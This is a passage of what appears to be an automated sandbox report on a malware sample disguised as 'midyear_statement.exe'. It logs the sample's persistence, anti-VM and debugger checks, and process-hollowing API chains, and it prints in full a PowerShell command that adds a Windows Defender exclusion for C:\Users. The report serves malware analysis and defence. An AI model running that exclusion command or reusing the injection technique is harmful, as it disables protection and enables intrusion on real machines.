Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040AC4B0 push ecx; mov dword ptr [esp], edx 0_2_040AC4B5
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040AD4E4 push 040AD510h; ret 0_2_040AD508
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040A66FA push 040A673Eh; ret 0_2_040A6736
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040A66FC push 040A673Eh; ret 0_2_040A6736
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040CB0AC push 040CB125h; ret 0_2_040CB11D
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040CB144 push 040CB1ECh; ret 0_2_040CB1E4
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040CB1F8 push 040CB288h; ret 0_2_040CB280
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040CA2A4 push 040CA4A4h; ret 0_2_040CA49C
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040A32C0 push eax; ret 0_2_040A32FC
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040CB2F4 push 040CB35Fh; ret 0_2_040CB357
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040A631E push 040A637Bh; ret 0_2_040A6373
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040A6320 push 040A637Bh; ret 0_2_040A6373
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040CC360 pushad ; ret 0_2_040CC365
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B7C48 push 040B7C80h; ret 0_2_040B7C78
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B7C46 push 040B7C80h; ret 0_2_040B7C78
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B5DC0 push ecx; mov dword ptr [esp], edx 0_2_040B5DC2
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B2EA4 push 040B2F1Ah; ret 0_2_040B2F12
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040CEF18 push eax; ret 0_2_040CEFE8
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B2FAF push 040B2FFDh; ret 0_2_040B2FF5
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B2FB0 push 040B2FFDh; ret 0_2_040B2FF5
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B7850 push 040B78CDh; ret 0_2_040B78C5
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B688A push 040B6937h; ret 0_2_040B692F
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B688C push 040B6937h; ret 0_2_040B692F
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B9AF8 push 040B9B30h; ret 0_2_040B9B28
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040ACB2B push 040ACCB6h; ret 0_2_040ACCAE
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040ACB30 push 040ACCB6h; ret 0_2_040ACCAE
Source: C:\Windows \System32\2506803.exe Code function: 16_2_613D0021 pushfq ; iretd 16_2_613D002A
Source: C:\Windows \System32\2506803.exe Code function: 16_2_613D0D00 pushfq ; ret 16_2_613D0D01
Source: C:\Windows \System32\2506803.exe Code function: 16_2_613D1DFE push rsp; iretd 16_2_613D1DFF
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_00402DB4 push eax; ret 24_2_00402E84

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\extrac32.exe File created: C:\Users\Public\Libraries\Dhuirrkw.PIF
Source: C:\Users\user\Desktop\midyear_statement.exe File created: C:\Users\Public\Libraries\wkrriuhD.pif
Source: C:\Windows\SysWOW64\cmd.exe Executable created and started: C:\Windows \System32\2506803.exe
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12336EB0 ShellExecuteW,URLDownloadToFileW, 24_2_12336EB0
Source: C:\Users\user\Desktop\midyear_statement.exe File created: C:\Windows \System32\2506803.exe
Source: C:\Users\user\Desktop\midyear_statement.exe File created: C:\Windows \System32\netutils.dll
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1234AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 24_2_1234AA4A
Source: C:\Users\user\Desktop\midyear_statement.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dhuirrkw
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B9B34 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_040B9B34
Source: C:\Users\user\Desktop\midyear_statement.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\wkrriuhD.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1233F7A7 Sleep,ExitProcess, 24_2_1233F7A7
Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 27_2_0040DD85
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 24_2_1234A748
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5574 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4195 Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif Window / User API: threadDelayed 9520 Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif Window / User API: foregroundWindowGot 1755 Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif API coverage: 9.9 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752 Thread sleep count: 5574 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752 Thread sleep count: 4195 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836 Thread sleep time: -11068046444225724s >= -30000s Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928 Thread sleep count: 143 > 30 Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928 Thread sleep time: -429000s >= -30000s Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7924 Thread sleep count: 139 > 30 Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7924 Thread sleep time: -69500s >= -30000s Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928 Thread sleep count: 9520 > 30 Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928 Thread sleep time: -28560000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\Windows\System32 FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040A5878 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_040A5878
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose, 24_2_00401612
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime, 24_2_0040128D
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12339253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 24_2_12339253
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1234C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 24_2_1234C291
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1233C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 24_2_1233C34D
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12339665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 24_2_12339665
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12349AF5 FindFirstFileW,FindNextFileW,FindNextFileW, 24_2_12349AF5
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1233BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 24_2_1233BB30
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1233783C FindFirstFileW,FindNextFileW, 24_2_1233783C
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1233880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 24_2_1233880C
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1237E879 FindFirstFileExA, 24_2_1237E879
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1233BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 24_2_1233BD37
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_146410F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 24_2_146410F1
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_14646580 FindFirstFileExA, 24_2_14646580
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_0040AE51 FindFirstFileW,FindNextFileW, 27_2_0040AE51
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 28_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 28_2_00407EF8
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12337C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 24_2_12337C97
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_00418981 memset,GetSystemInfo, 27_2_00418981
Source: svchost.exe, 00000009.00000002.3646811739.0000026BC204B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2080000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Dhuirrkw.PIF, 0000001E.00000003.1564727013.000000000077B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: svchost.exe, 00000009.00000002.3646615871.0000026BC202B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: midyear_statement.exe, 00000000.00000002.1362063312.000000000085C000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124E9000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1379159545.00000000124E0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1405851694.00000000124E9000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1382585003.00000000124E5000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000009.00000002.3644458412.0000026BC2002000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: bhv348F.tmp.27.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2064000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWj
Source: svchost.exe, 00000009.00000002.3647045184.0000026BC208D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2064000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000`
Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2064000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000{#s
Source: Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW_
Source: Dhuirrkw.PIF, 00000020.00000003.1637043609.000000000078E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000009.00000002.3646811739.0000026BC204B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\midyear_statement.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\wkrriuhD.pif API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1236BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_1236BB22
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B7A50 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 0_2_040B7A50
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_0059113F mov eax, dword ptr fs:[00000030h] 24_2_0059113F
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_0059113F mov eax, dword ptr fs:[00000030h] 24_2_0059113F
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005D4097 mov eax, dword ptr fs:[00000030h] 24_2_005D4097
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_123732B5 mov eax, dword ptr fs:[00000030h] 24_2_123732B5
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_14644AB4 mov eax, dword ptr fs:[00000030h] 24_2_14644AB4
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12341CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError, 24_2_12341CFE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif Process token adjusted: Debug
Source: C:\Windows \System32\2506803.exe Code function: 16_2_613C21C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_613C21C0
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12364B47 SetUnhandledExceptionFilter, 24_2_12364B47
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_123649F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_123649F9
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12364FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_2_12364FDC
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_14642639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_14642639
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_146460E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_146460E2
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_14642B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_2_14642B1C

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Memory allocated: C:\Users\Public\Libraries\wkrriuhD.pif base: 590000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF Memory allocated: C:\Users\Public\Libraries\wkrriuhD.pif base: 590000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_123480EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 24_2_123480EF
Source: C:\Users\Public\Libraries\wkrriuhD.pif Section loaded: NULL target: C:\Users\Public\Libraries\wkrriuhD.pif protection: execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif Section loaded: NULL target: C:\Users\Public\Libraries\wkrriuhD.pif protection: execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif Section loaded: NULL target: C:\Users\Public\Libraries\wkrriuhD.pif protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe Memory written: C:\Users\Public\Libraries\wkrriuhD.pif base: 293008 Jump to behavior
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF Memory written: C:\Users\Public\Libraries\wkrriuhD.pif base: 2C2008
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF Memory written: C:\Users\Public\Libraries\wkrriuhD.pif base: 3B2008
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 24_2_123420F7
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12349627 mouse_event, 24_2_12349627
Source: C:\Users\user\Desktop\midyear_statement.exe Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows \System32\2506803.exe "C:\Windows \System32\2506803.exe" Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb" Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\tumlrwcijhwjehgnqmoeyldobicnm" Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\vozespnjxpoopncrzwbyjypxcpmofmxl" Jump to behavior
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerP5\0
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager"
Source: wkrriuhD.pif, 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager573ef12
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerP5\
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerk
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerP5\22
Source: wkrriuhD.pif, 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerP5\511
Source: wkrriuhD.pif, 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, logs.dat.24.dr Binary or memory string: [Program Manager]
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_005C5A34 cpuid 24_2_005C5A34
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_040A5A3C
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: GetLocaleInfoA, 0_2_040AA708
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: GetLocaleInfoA, 0_2_040AA754
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_040A5B48
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: GetLocaleInfoA, 24_2_1233F8D1
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: GetLocaleInfoW, 24_2_12382313
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: EnumSystemLocalesW, 24_2_12382036
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 24_2_123820C3
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 24_2_12382610
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 24_2_1238243C
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: EnumSystemLocalesW, 24_2_12378404
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: GetLocaleInfoW, 24_2_12382543
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: GetLocaleInfoW, 24_2_123788ED
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: EnumSystemLocalesW, 24_2_12381F50
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: EnumSystemLocalesW, 24_2_12381F9B
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 24_2_12381CD8
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
